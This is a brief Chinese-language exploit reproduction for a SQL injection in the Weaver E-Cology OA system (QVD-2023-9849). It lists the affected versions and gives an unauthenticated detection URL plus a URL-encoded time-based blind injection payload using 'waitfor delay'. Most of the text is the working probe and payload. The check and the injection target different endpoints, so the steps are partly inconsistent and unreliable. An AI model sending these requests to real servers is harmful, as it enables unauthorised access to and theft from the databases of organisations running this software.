泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现
1.漏洞描述
泛微 Ecology OA 系统对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
影响版本:泛微 Ecology 9.x <= v10.56;泛微 Ecology 8.x <= v10.56
2.漏洞复现
POC
/mobile/plugin/CheckServer.jsp?type=mobileSetting
返回状态码200且参数值为{"error";"system error"}证明漏洞存在
进行延时注入:
/weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1%2F**%2Fand(select%2F**%2F1)%3E0%2F**%2Fwaitfor%2F**%2Fdelay'0%3A0%3A10'%2F**%2F
0%3A0%3A10 实际上表示 0:0:10 延时10秒
